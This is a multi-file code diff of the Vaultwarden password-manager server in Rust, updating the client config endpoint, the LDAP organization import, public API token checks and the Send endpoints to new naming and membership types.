parse_experimental_client_feature_flags(&crate::CONFIG.experimental_client_feature_flags());
|
||||||
|
feature_states.insert("duo-redirect".to_string(), true);
|
||||||
|
feature_states.insert("email-verification".to_string(), true);
|
||||||
|
feature_states.insert("unauth-ui-refresh".to_string(), true);
|
||||||
|
feature_states.insert("enable-pm-flight-recorder".to_string(), true);
|
||||||
|
feature_states.insert("mobile-error-reporting".to_string(), true);
|
||||||
|
|
||||||
Json(json!({
|
Json(json!({
|
||||||
// Note: The clients use this version to handle backwards compatibility concerns
|
// Note: The clients use this version to handle backwards compatibility concerns
|
||||||
// This means they expect a version that closely matches the Bitwarden server version
|
// This means they expect a version that closely matches the Bitwarden server version
|
||||||
// We should make sure that we keep this updated when we support the new server features
|
// We should make sure that we keep this updated when we support the new server features
|
||||||
// Version history:
|
// Version history:
|
||||||
// - Individual cipher key encryption: 2023.9.1
|
// - Individual cipher key encryption: 2024.2.0
|
||||||
"version": "2023.9.1",
|
"version": "2025.6.0",
|
||||||
"gitHash": option_env!("GIT_REV"),
|
"gitHash": option_env!("GIT_REV"),
|
||||||
"server": {
|
"server": {
|
||||||
"name": "Vaultwarden",
|
"name": "Vaultwarden",
|
||||||
"url": "https://github.com/dani-garcia/vaultwarden",
|
"url": "https://github.com/dani-garcia/vaultwarden"
|
||||||
"version": crate::VERSION
|
},
|
||||||
|
"settings": {
|
||||||
|
"disableUserRegistration": !crate::CONFIG.signups_allowed() && crate::CONFIG.signups_domains_whitelist().is_empty(),
|
||||||
},
|
},
|
||||||
"environment": {
|
"environment": {
|
||||||
"vault": domain,
|
"vault": domain,
|
||||||
@@ -211,6 +233,12 @@ fn config() -> Json<Value> {
|
|||||||
"identity": format!("{domain}/identity"),
|
"identity": format!("{domain}/identity"),
|
||||||
"notifications": format!("{domain}/notifications"),
|
"notifications": format!("{domain}/notifications"),
|
||||||
"sso": "",
|
"sso": "",
|
||||||
|
"cloudRegion": null,
|
||||||
|
},
|
||||||
|
// Bitwarden uses this for the self-hosted servers to indicate the default push technology
|
||||||
|
"push": {
|
||||||
|
"pushTechnology": 0,
|
||||||
|
"vapidPublicKey": null
|
||||||
},
|
},
|
||||||
"featureStates": feature_states,
|
"featureStates": feature_states,
|
||||||
"object": "config",
|
"object": "config",
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -1,13 +1,14 @@
|
|||||||
use chrono::Utc;
|
use chrono::Utc;
|
||||||
use rocket::{
|
use rocket::{
|
||||||
request::{self, FromRequest, Outcome},
|
request::{FromRequest, Outcome},
|
||||||
|
serde::json::Json,
|
||||||
Request, Route,
|
Request, Route,
|
||||||
};
|
};
|
||||||
|
|
||||||
use std::collections::HashSet;
|
use std::collections::HashSet;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{EmptyResult, JsonUpcase},
|
api::EmptyResult,
|
||||||
auth,
|
auth,
|
||||||
db::{models::*, DbConn},
|
db::{models::*, DbConn},
|
||||||
mail, CONFIG,
|
mail, CONFIG,
|
||||||
@@ -18,103 +19,99 @@ pub fn routes() -> Vec<Route> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct OrgImportGroupData {
|
struct OrgImportGroupData {
|
||||||
Name: String,
|
name: String,
|
||||||
ExternalId: String,
|
external_id: String,
|
||||||
MemberExternalIds: Vec<String>,
|
member_external_ids: Vec<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct OrgImportUserData {
|
struct OrgImportUserData {
|
||||||
Email: String,
|
email: String,
|
||||||
ExternalId: String,
|
external_id: String,
|
||||||
Deleted: bool,
|
deleted: bool,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct OrgImportData {
|
struct OrgImportData {
|
||||||
Groups: Vec<OrgImportGroupData>,
|
groups: Vec<OrgImportGroupData>,
|
||||||
Members: Vec<OrgImportUserData>,
|
members: Vec<OrgImportUserData>,
|
||||||
OverwriteExisting: bool,
|
overwrite_existing: bool,
|
||||||
// LargeImport: bool, // For now this will not be used, upstream uses this to prevent syncs of more then 2000 users or groups without the flag set.
|
// largeImport: bool, // For now this will not be used, upstream uses this to prevent syncs of more then 2000 users or groups without the flag set.
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/public/organization/import", data = "<data>")]
|
#[post("/public/organization/import", data = "<data>")]
|
||||||
async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut conn: DbConn) -> EmptyResult {
|
async fn ldap_import(data: Json<OrgImportData>, token: PublicToken, mut conn: DbConn) -> EmptyResult {
|
||||||
// Most of the logic for this function can be found here
|
// Most of the logic for this function can be found here
|
||||||
// https://github.com/bitwarden/server/blob/fd892b2ff4547648a276734fb2b14a8abae2c6f5/src/Core/Services/Implementations/OrganizationService.cs#L1797
|
// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Core/AdminConsole/Services/Implementations/OrganizationService.cs#L1203
|
||||||
|
|
||||||
let org_id = token.0;
|
let org_id = token.0;
|
||||||
let data = data.into_inner().data;
|
let data = data.into_inner();
|
||||||
|
|
||||||
for user_data in &data.Members {
|
for user_data in &data.members {
|
||||||
if user_data.Deleted {
|
let mut user_created: bool = false;
|
||||||
|
if user_data.deleted {
|
||||||
// If user is marked for deletion and it exists, revoke it
|
// If user is marked for deletion and it exists, revoke it
|
||||||
if let Some(mut user_org) =
|
if let Some(mut member) = Membership::find_by_email_and_org(&user_data.email, &org_id, &mut conn).await {
|
||||||
UserOrganization::find_by_email_and_org(&user_data.Email, &org_id, &mut conn).await
|
|
||||||
{
|
|
||||||
// Only revoke a user if it is not the last confirmed owner
|
// Only revoke a user if it is not the last confirmed owner
|
||||||
let revoked = if user_org.atype == UserOrgType::Owner
|
let revoked = if member.atype == MembershipType::Owner
|
||||||
&& user_org.status == UserOrgStatus::Confirmed as i32
|
&& member.status == MembershipStatus::Confirmed as i32
|
||||||
{
|
{
|
||||||
if UserOrganization::count_confirmed_by_org_and_type(&org_id, UserOrgType::Owner, &mut conn).await
|
if Membership::count_confirmed_by_org_and_type(&org_id, MembershipType::Owner, &mut conn).await <= 1
|
||||||
<= 1
|
|
||||||
{
|
{
|
||||||
warn!("Can't revoke the last owner");
|
warn!("Can't revoke the last owner");
|
||||||
false
|
false
|
||||||
} else {
|
} else {
|
||||||
user_org.revoke()
|
member.revoke()
|
||||||
}
|
}
|
||||||
} else {
|
} else {
|
||||||
user_org.revoke()
|
member.revoke()
|
||||||
};
|
};
|
||||||
|
|
||||||
let ext_modified = user_org.set_external_id(Some(user_data.ExternalId.clone()));
|
let ext_modified = member.set_external_id(Some(user_data.external_id.clone()));
|
||||||
if revoked || ext_modified {
|
if revoked || ext_modified {
|
||||||
user_org.save(&mut conn).await?;
|
member.save(&mut conn).await?;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
// If user is part of the organization, restore it
|
// If user is part of the organization, restore it
|
||||||
} else if let Some(mut user_org) =
|
} else if let Some(mut member) = Membership::find_by_email_and_org(&user_data.email, &org_id, &mut conn).await {
|
||||||
UserOrganization::find_by_email_and_org(&user_data.Email, &org_id, &mut conn).await
|
let restored = member.restore();
|
||||||
{
|
let ext_modified = member.set_external_id(Some(user_data.external_id.clone()));
|
||||||
let restored = user_org.restore();
|
|
||||||
let ext_modified = user_org.set_external_id(Some(user_data.ExternalId.clone()));
|
|
||||||
if restored || ext_modified {
|
if restored || ext_modified {
|
||||||
user_org.save(&mut conn).await?;
|
member.save(&mut conn).await?;
|
||||||
}
|
}
|
||||||
} else {
|
} else {
|
||||||
// If user is not part of the organization
|
// If user is not part of the organization
|
||||||
let user = match User::find_by_mail(&user_data.Email, &mut conn).await {
|
let user = match User::find_by_mail(&user_data.email, &mut conn).await {
|
||||||
Some(user) => user, // exists in vaultwarden
|
Some(user) => user, // exists in vaultwarden
|
||||||
None => {
|
None => {
|
||||||
// User does not exist yet
|
// User does not exist yet
|
||||||
let mut new_user = User::new(user_data.Email.clone());
|
let mut new_user = User::new(user_data.email.clone());
|
||||||
new_user.save(&mut conn).await?;
|
new_user.save(&mut conn).await?;
|
||||||
|
|
||||||
if !CONFIG.mail_enabled() {
|
if !CONFIG.mail_enabled() {
|
||||||
let invitation = Invitation::new(&new_user.email);
|
Invitation::new(&new_user.email).save(&mut conn).await?;
|
||||||
invitation.save(&mut conn).await?;
|
|
||||||
}
|
}
|
||||||
|
user_created = true;
|
||||||
new_user
|
new_user
|
||||||
}
|
}
|
||||||
};
|
};
|
||||||
let user_org_status = if CONFIG.mail_enabled() || user.password_hash.is_empty() {
|
let member_status = if CONFIG.mail_enabled() || user.password_hash.is_empty() {
|
||||||
UserOrgStatus::Invited as i32
|
MembershipStatus::Invited as i32
|
||||||
} else {
|
} else {
|
||||||
UserOrgStatus::Accepted as i32 // Automatically mark user as accepted if no email invites
|
MembershipStatus::Accepted as i32 // Automatically mark user as accepted if no email invites
|
||||||
};
|
};
|
||||||
|
|
||||||
let mut new_org_user = UserOrganization::new(user.uuid.clone(), org_id.clone());
|
let mut new_member = Membership::new(user.uuid.clone(), org_id.clone());
|
||||||
new_org_user.set_external_id(Some(user_data.ExternalId.clone()));
|
new_member.set_external_id(Some(user_data.external_id.clone()));
|
||||||
new_org_user.access_all = false;
|
new_member.access_all = false;
|
||||||
new_org_user.atype = UserOrgType::User as i32;
|
new_member.atype = MembershipType::User as i32;
|
||||||
new_org_user.status = user_org_status;
|
new_member.status = member_status;
|
||||||
|
|
||||||
new_org_user.save(&mut conn).await?;
|
new_member.save(&mut conn).await?;
|
||||||
|
|
||||||
if CONFIG.mail_enabled() {
|
if CONFIG.mail_enabled() {
|
||||||
let (org_name, org_email) = match Organization::find_by_uuid(&org_id, &mut conn).await {
|
let (org_name, org_email) = match Organization::find_by_uuid(&org_id, &mut conn).await {
|
||||||
@@ -122,26 +119,34 @@ async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut co
|
|||||||
None => err!("Error looking up organization"),
|
None => err!("Error looking up organization"),
|
||||||
};
|
};
|
||||||
|
|
||||||
mail::send_invite(
|
if let Err(e) =
|
||||||
&user_data.Email,
|
mail::send_invite(&user, org_id.clone(), new_member.uuid.clone(), &org_name, Some(org_email)).await
|
||||||
&user.uuid,
|
{
|
||||||
Some(org_id.clone()),
|
// Upon error delete the user, invite and org member records when needed
|
||||||
Some(new_org_user.uuid),
|
if user_created {
|
||||||
&org_name,
|
user.delete(&mut conn).await?;
|
||||||
Some(org_email),
|
} else {
|
||||||
)
|
new_member.delete(&mut conn).await?;
|
||||||
.await?;
|
}
|
||||||
|
|
||||||
|
err!(format!("Error sending invite: {e:?} "));
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
if CONFIG.org_groups_enabled() {
|
if CONFIG.org_groups_enabled() {
|
||||||
for group_data in &data.Groups {
|
for group_data in &data.groups {
|
||||||
let group_uuid = match Group::find_by_external_id(&group_data.ExternalId, &mut conn).await {
|
let group_uuid = match Group::find_by_external_id_and_org(&group_data.external_id, &org_id, &mut conn).await
|
||||||
|
{
|
||||||
Some(group) => group.uuid,
|
Some(group) => group.uuid,
|
||||||
None => {
|
None => {
|
||||||
let mut group =
|
let mut group = Group::new(
|
||||||
Group::new(org_id.clone(), group_data.Name.clone(), false, Some(group_data.ExternalId.clone()));
|
org_id.clone(),
|
||||||
|
group_data.name.clone(),
|
||||||
|
false,
|
||||||
|
Some(group_data.external_id.clone()),
|
||||||
|
);
|
||||||
group.save(&mut conn).await?;
|
group.save(&mut conn).await?;
|
||||||
group.uuid
|
group.uuid
|
||||||
}
|
}
|
||||||
@@ -149,10 +154,9 @@ async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut co
|
|||||||
|
|
||||||
GroupUser::delete_all_by_group(&group_uuid, &mut conn).await?;
|
GroupUser::delete_all_by_group(&group_uuid, &mut conn).await?;
|
||||||
|
|
||||||
for ext_id in &group_data.MemberExternalIds {
|
for ext_id in &group_data.member_external_ids {
|
||||||
if let Some(user_org) = UserOrganization::find_by_external_id_and_org(ext_id, &org_id, &mut conn).await
|
if let Some(member) = Membership::find_by_external_id_and_org(ext_id, &org_id, &mut conn).await {
|
||||||
{
|
let mut group_user = GroupUser::new(group_uuid.clone(), member.uuid.clone());
|
||||||
let mut group_user = GroupUser::new(group_uuid.clone(), user_org.uuid.clone());
|
|
||||||
group_user.save(&mut conn).await?;
|
group_user.save(&mut conn).await?;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -162,23 +166,22 @@ async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut co
|
|||||||
}
|
}
|
||||||
|
|
||||||
// If this flag is enabled, any user that isn't provided in the Users list will be removed (by default they will be kept unless they have Deleted == true)
|
// If this flag is enabled, any user that isn't provided in the Users list will be removed (by default they will be kept unless they have Deleted == true)
|
||||||
if data.OverwriteExisting {
|
if data.overwrite_existing {
|
||||||
// Generate a HashSet to quickly verify if a member is listed or not.
|
// Generate a HashSet to quickly verify if a member is listed or not.
|
||||||
let sync_members: HashSet<String> = data.Members.into_iter().map(|m| m.ExternalId).collect();
|
let sync_members: HashSet<String> = data.members.into_iter().map(|m| m.external_id).collect();
|
||||||
for user_org in UserOrganization::find_by_org(&org_id, &mut conn).await {
|
for member in Membership::find_by_org(&org_id, &mut conn).await {
|
||||||
if let Some(ref user_external_id) = user_org.external_id {
|
if let Some(ref user_external_id) = member.external_id {
|
||||||
if !sync_members.contains(user_external_id) {
|
if !sync_members.contains(user_external_id) {
|
||||||
if user_org.atype == UserOrgType::Owner && user_org.status == UserOrgStatus::Confirmed as i32 {
|
if member.atype == MembershipType::Owner && member.status == MembershipStatus::Confirmed as i32 {
|
||||||
// Removing owner, check that there is at least one other confirmed owner
|
// Removing owner, check that there is at least one other confirmed owner
|
||||||
if UserOrganization::count_confirmed_by_org_and_type(&org_id, UserOrgType::Owner, &mut conn)
|
if Membership::count_confirmed_by_org_and_type(&org_id, MembershipType::Owner, &mut conn).await
|
||||||
.await
|
|
||||||
<= 1
|
<= 1
|
||||||
{
|
{
|
||||||
warn!("Can't delete the last owner");
|
warn!("Can't delete the last owner");
|
||||||
continue;
|
continue;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
user_org.delete(&mut conn).await?;
|
member.delete(&mut conn).await?;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -187,13 +190,13 @@ async fn ldap_import(data: JsonUpcase<OrgImportData>, token: PublicToken, mut co
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub struct PublicToken(String);
|
pub struct PublicToken(OrganizationId);
|
||||||
|
|
||||||
#[rocket::async_trait]
|
#[rocket::async_trait]
|
||||||
impl<'r> FromRequest<'r> for PublicToken {
|
impl<'r> FromRequest<'r> for PublicToken {
|
||||||
type Error = &'static str;
|
type Error = &'static str;
|
||||||
|
|
||||||
async fn from_request(request: &'r Request<'_>) -> request::Outcome<Self, Self::Error> {
|
async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
|
||||||
let headers = request.headers();
|
let headers = request.headers();
|
||||||
// Get access_token
|
// Get access_token
|
||||||
let access_token: &str = match headers.get_one("Authorization") {
|
let access_token: &str = match headers.get_one("Authorization") {
|
||||||
@@ -204,24 +207,19 @@ impl<'r> FromRequest<'r> for PublicToken {
|
|||||||
None => err_handler!("No access token provided"),
|
None => err_handler!("No access token provided"),
|
||||||
};
|
};
|
||||||
// Check JWT token is valid and get device and user from it
|
// Check JWT token is valid and get device and user from it
|
||||||
let claims = match auth::decode_api_org(access_token) {
|
let Ok(claims) = auth::decode_api_org(access_token) else {
|
||||||
Ok(claims) => claims,
|
err_handler!("Invalid claim")
|
||||||
Err(_) => err_handler!("Invalid claim"),
|
|
||||||
};
|
};
|
||||||
// Check if time is between claims.nbf and claims.exp
|
// Check if time is between claims.nbf and claims.exp
|
||||||
let time_now = Utc::now().naive_utc().timestamp();
|
let time_now = Utc::now().timestamp();
|
||||||
if time_now < claims.nbf {
|
if time_now < claims.nbf {
|
||||||
err_handler!("Token issued in the future");
|
err_handler!("Token issued in the future");
|
||||||
}
|
}
|
||||||
if time_now > claims.exp {
|
if time_now > claims.exp {
|
||||||
err_handler!("Token expired");
|
err_handler!("Token expired");
|
||||||
}
|
}
|
||||||
// Check if claims.iss is host|claims.scope[0]
|
// Check if claims.iss is domain|claims.scope[0]
|
||||||
let host = match auth::Host::from_request(request).await {
|
let complete_host = format!("{}|{}", CONFIG.domain_origin(), claims.scope[0]);
|
||||||
Outcome::Success(host) => host,
|
|
||||||
_ => err_handler!("Error getting Host"),
|
|
||||||
};
|
|
||||||
let complete_host = format!("{}|{}", host.host, claims.scope[0]);
|
|
||||||
if complete_host != claims.iss {
|
if complete_host != claims.iss {
|
||||||
err_handler!("Token not issued by this server");
|
err_handler!("Token not issued by this server");
|
||||||
}
|
}
|
||||||
@@ -232,13 +230,12 @@ impl<'r> FromRequest<'r> for PublicToken {
|
|||||||
Outcome::Success(conn) => conn,
|
Outcome::Success(conn) => conn,
|
||||||
_ => err_handler!("Error getting DB"),
|
_ => err_handler!("Error getting DB"),
|
||||||
};
|
};
|
||||||
let org_uuid = match claims.client_id.strip_prefix("organization.") {
|
let Some(org_id) = claims.client_id.strip_prefix("organization.") else {
|
||||||
Some(uuid) => uuid,
|
err_handler!("Malformed client_id")
|
||||||
None => err_handler!("Malformed client_id"),
|
|
||||||
};
|
};
|
||||||
let org_api_key = match OrganizationApiKey::find_by_org_uuid(org_uuid, &conn).await {
|
let org_id: OrganizationId = org_id.to_string().into();
|
||||||
Some(org_api_key) => org_api_key,
|
let Some(org_api_key) = OrganizationApiKey::find_by_org_uuid(&org_id, &conn).await else {
|
||||||
None => err_handler!("Invalid client_id"),
|
err_handler!("Invalid client_id")
|
||||||
};
|
};
|
||||||
if org_api_key.org_uuid != claims.client_sub {
|
if org_api_key.org_uuid != claims.client_sub {
|
||||||
err_handler!("Token not issued for this org");
|
err_handler!("Token not issued for this org");
|
||||||
|
|||||||
@@ -1,7 +1,9 @@
|
|||||||
use std::path::Path;
|
use std::path::Path;
|
||||||
|
use std::time::Duration;
|
||||||
|
|
||||||
use chrono::{DateTime, Duration, Utc};
|
use chrono::{DateTime, TimeDelta, Utc};
|
||||||
use num_traits::ToPrimitive;
|
use num_traits::ToPrimitive;
|
||||||
|
use once_cell::sync::Lazy;
|
||||||
use rocket::form::Form;
|
use rocket::form::Form;
|
||||||
use rocket::fs::NamedFile;
|
use rocket::fs::NamedFile;
|
||||||
use rocket::fs::TempFile;
|
use rocket::fs::TempFile;
|
||||||
@@ -9,14 +11,30 @@ use rocket::serde::json::Json;
|
|||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{ApiResult, EmptyResult, JsonResult, JsonUpcase, Notify, UpdateType},
|
api::{ApiResult, EmptyResult, JsonResult, Notify, UpdateType},
|
||||||
auth::{ClientIp, Headers, Host},
|
auth::{ClientIp, Headers, Host},
|
||||||
|
config::PathType,
|
||||||
db::{models::*, DbConn, DbPool},
|
db::{models::*, DbConn, DbPool},
|
||||||
util::{NumberOrString, SafeString},
|
util::{save_temp_file, NumberOrString},
|
||||||
CONFIG,
|
CONFIG,
|
||||||
};
|
};
|
||||||
|
|
||||||
const SEND_INACCESSIBLE_MSG: &str = "Send does not exist or is no longer available";
|
const SEND_INACCESSIBLE_MSG: &str = "Send does not exist or is no longer available";
|
||||||
|
static ANON_PUSH_DEVICE: Lazy<Device> = Lazy::new(|| {
|
||||||
|
let dt = crate::util::parse_date("1970-01-01T00:00:00.000000Z");
|
||||||
|
Device {
|
||||||
|
uuid: String::from("00000000-0000-0000-0000-000000000000").into(),
|
||||||
|
created_at: dt,
|
||||||
|
updated_at: dt,
|
||||||
|
user_uuid: String::from("00000000-0000-0000-0000-000000000000").into(),
|
||||||
|
name: String::new(),
|
||||||
|
atype: 14, // 14 == Unknown Browser
|
||||||
|
push_uuid: Some(String::from("00000000-0000-0000-0000-000000000000").into()),
|
||||||
|
push_token: None,
|
||||||
|
refresh_token: String::new(),
|
||||||
|
twofactor_remember: None,
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
// The max file size allowed by Bitwarden clients and add an extra 5% to avoid issues
|
// The max file size allowed by Bitwarden clients and add an extra 5% to avoid issues
|
||||||
const SIZE_525_MB: i64 = 550_502_400;
|
const SIZE_525_MB: i64 = 550_502_400;
|
||||||
@@ -48,23 +66,26 @@ pub async fn purge_sends(pool: DbPool) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct SendData {
|
pub struct SendData {
|
||||||
Type: i32,
|
r#type: i32,
|
||||||
Key: String,
|
key: String,
|
||||||
Password: Option<String>,
|
password: Option<String>,
|
||||||
MaxAccessCount: Option<NumberOrString>,
|
max_access_count: Option<NumberOrString>,
|
||||||
ExpirationDate: Option<DateTime<Utc>>,
|
expiration_date: Option<DateTime<Utc>>,
|
||||||
DeletionDate: DateTime<Utc>,
|
deletion_date: DateTime<Utc>,
|
||||||
Disabled: bool,
|
disabled: bool,
|
||||||
HideEmail: Option<bool>,
|
hide_email: Option<bool>,
|
||||||
|
|
||||||
// Data field
|
// Data field
|
||||||
Name: String,
|
name: String,
|
||||||
Notes: Option<String>,
|
notes: Option<String>,
|
||||||
Text: Option<Value>,
|
text: Option<Value>,
|
||||||
File: Option<Value>,
|
file: Option<Value>,
|
||||||
FileLength: Option<NumberOrString>,
|
file_length: Option<NumberOrString>,
|
||||||
|
|
||||||
|
// Used for key rotations
|
||||||
|
pub id: Option<SendId>,
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Enforces the `Disable Send` policy. A non-owner/admin user belonging to
|
/// Enforces the `Disable Send` policy. A non-owner/admin user belonging to
|
||||||
@@ -76,9 +97,9 @@ struct SendData {
|
|||||||
/// There is also a Vaultwarden-specific `sends_allowed` config setting that
|
/// There is also a Vaultwarden-specific `sends_allowed` config setting that
|
||||||
/// controls this policy globally.
|
/// controls this policy globally.
|
||||||
async fn enforce_disable_send_policy(headers: &Headers, conn: &mut DbConn) -> EmptyResult {
|
async fn enforce_disable_send_policy(headers: &Headers, conn: &mut DbConn) -> EmptyResult {
|
||||||
let user_uuid = &headers.user.uuid;
|
let user_id = &headers.user.uuid;
|
||||||
if !CONFIG.sends_allowed()
|
if !CONFIG.sends_allowed()
|
||||||
|| OrgPolicy::is_applicable_to_user(user_uuid, OrgPolicyType::DisableSend, None, conn).await
|
|| OrgPolicy::is_applicable_to_user(user_id, OrgPolicyType::DisableSend, None, conn).await
|
||||||
{
|
{
|
||||||
err!("Due to an Enterprise Policy, you are only able to delete an existing Send.")
|
err!("Due to an Enterprise Policy, you are only able to delete an existing Send.")
|
||||||
}
|
}
|
||||||
@@ -92,9 +113,9 @@ async fn enforce_disable_send_policy(headers: &Headers, conn: &mut DbConn) -> Em
|
|||||||
///
|
///
|
||||||
/// Ref: https://bitwarden.com/help/article/policies/#send-options
|
/// Ref: https://bitwarden.com/help/article/policies/#send-options
|
||||||
async fn enforce_disable_hide_email_policy(data: &SendData, headers: &Headers, conn: &mut DbConn) -> EmptyResult {
|
async fn enforce_disable_hide_email_policy(data: &SendData, headers: &Headers, conn: &mut DbConn) -> EmptyResult {
|
||||||
let user_uuid = &headers.user.uuid;
|
let user_id = &headers.user.uuid;
|
||||||
let hide_email = data.HideEmail.unwrap_or(false);
|
let hide_email = data.hide_email.unwrap_or(false);
|
||||||
if hide_email && OrgPolicy::is_hide_email_disabled(user_uuid, conn).await {
|
if hide_email && OrgPolicy::is_hide_email_disabled(user_id, conn).await {
|
||||||
err!(
|
err!(
|
||||||
"Due to an Enterprise Policy, you are not allowed to hide your email address \
|
"Due to an Enterprise Policy, you are not allowed to hide your email address \
|
||||||
from recipients when creating or editing a Send."
|
from recipients when creating or editing a Send."
|
||||||
@@ -103,41 +124,41 @@ async fn enforce_disable_hide_email_policy(data: &SendData, headers: &Headers, c
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
fn create_send(data: SendData, user_uuid: String) -> ApiResult<Send> {
|
fn create_send(data: SendData, user_id: UserId) -> ApiResult<Send> {
|
||||||
let data_val = if data.Type == SendType::Text as i32 {
|
let data_val = if data.r#type == SendType::Text as i32 {
|
||||||
data.Text
|
data.text
|
||||||
} else if data.Type == SendType::File as i32 {
|
} else if data.r#type == SendType::File as i32 {
|
||||||
data.File
|
data.file
|
||||||
} else {
|
} else {
|
||||||
err!("Invalid Send type")
|
err!("Invalid Send type")
|
||||||
};
|
};
|
||||||
|
|
||||||
let data_str = if let Some(mut d) = data_val {
|
let data_str = if let Some(mut d) = data_val {
|
||||||
d.as_object_mut().and_then(|o| o.remove("Response"));
|
d.as_object_mut().and_then(|o| o.remove("response"));
|
||||||
serde_json::to_string(&d)?
|
serde_json::to_string(&d)?
|
||||||
} else {
|
} else {
|
||||||
err!("Send data not provided");
|
err!("Send data not provided");
|
||||||
};
|
};
|
||||||
|
|
||||||
if data.DeletionDate > Utc::now() + Duration::days(31) {
|
if data.deletion_date > Utc::now() + TimeDelta::try_days(31).unwrap() {
|
||||||
err!(
|
err!(
|
||||||
"You cannot have a Send with a deletion date that far into the future. Adjust the Deletion Date to a value less than 31 days from now and try again."
|
"You cannot have a Send with a deletion date that far into the future. Adjust the Deletion Date to a value less than 31 days from now and try again."
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
let mut send = Send::new(data.Type, data.Name, data_str, data.Key, data.DeletionDate.naive_utc());
|
let mut send = Send::new(data.r#type, data.name, data_str, data.key, data.deletion_date.naive_utc());
|
||||||
send.user_uuid = Some(user_uuid);
|
send.user_uuid = Some(user_id);
|
||||||
send.notes = data.Notes;
|
send.notes = data.notes;
|
||||||
send.max_access_count = match data.MaxAccessCount {
|
send.max_access_count = match data.max_access_count {
|
||||||
Some(m) => Some(m.into_i32()?),
|
Some(m) => Some(m.into_i32()?),
|
||||||
_ => None,
|
_ => None,
|
||||||
};
|
};
|
||||||
send.expiration_date = data.ExpirationDate.map(|d| d.naive_utc());
|
send.expiration_date = data.expiration_date.map(|d| d.naive_utc());
|
||||||
send.disabled = data.Disabled;
|
send.disabled = data.disabled;
|
||||||
send.hide_email = data.HideEmail;
|
send.hide_email = data.hide_email;
|
||||||
send.atype = data.Type;
|
send.atype = data.r#type;
|
||||||
|
|
||||||
send.set_password(data.Password.as_deref());
|
send.set_password(data.password.as_deref());
|
||||||
|
|
||||||
Ok(send)
|
Ok(send)
|
||||||
}
|
}
|
||||||
@@ -148,34 +169,28 @@ async fn get_sends(headers: Headers, mut conn: DbConn) -> Json<Value> {
|
|||||||
let sends_json: Vec<Value> = sends.await.iter().map(|s| s.to_json()).collect();
|
let sends_json: Vec<Value> = sends.await.iter().map(|s| s.to_json()).collect();
|
||||||
|
|
||||||
Json(json!({
|
Json(json!({
|
||||||
"Data": sends_json,
|
"data": sends_json,
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": null
|
"continuationToken": null
|
||||||
}))
|
}))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/sends/<uuid>")]
|
#[get("/sends/<send_id>")]
|
||||||
async fn get_send(uuid: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn get_send(send_id: SendId, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let send = match Send::find_by_uuid(uuid, &mut conn).await {
|
match Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await {
|
||||||
Some(send) => send,
|
Some(send) => Ok(Json(send.to_json())),
|
||||||
None => err!("Send not found"),
|
None => err!("Send not found", "Invalid send uuid or does not belong to user"),
|
||||||
};
|
|
||||||
|
|
||||||
if send.user_uuid.as_ref() != Some(&headers.user.uuid) {
|
|
||||||
err!("Send is not owned by user")
|
|
||||||
}
|
}
|
||||||
|
|
||||||
Ok(Json(send.to_json()))
|
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/sends", data = "<data>")]
|
#[post("/sends", data = "<data>")]
|
||||||
async fn post_send(data: JsonUpcase<SendData>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
async fn post_send(data: Json<SendData>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
||||||
enforce_disable_send_policy(&headers, &mut conn).await?;
|
enforce_disable_send_policy(&headers, &mut conn).await?;
|
||||||
|
|
||||||
let data: SendData = data.into_inner().data;
|
let data: SendData = data.into_inner();
|
||||||
enforce_disable_hide_email_policy(&data, &headers, &mut conn).await?;
|
enforce_disable_hide_email_policy(&data, &headers, &mut conn).await?;
|
||||||
|
|
||||||
if data.Type == SendType::File as i32 {
|
if data.r#type == SendType::File as i32 {
|
||||||
err!("File sends should use /api/sends/file")
|
err!("File sends should use /api/sends/file")
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -185,7 +200,7 @@ async fn post_send(data: JsonUpcase<SendData>, headers: Headers, mut conn: DbCon
|
|||||||
UpdateType::SyncSendCreate,
|
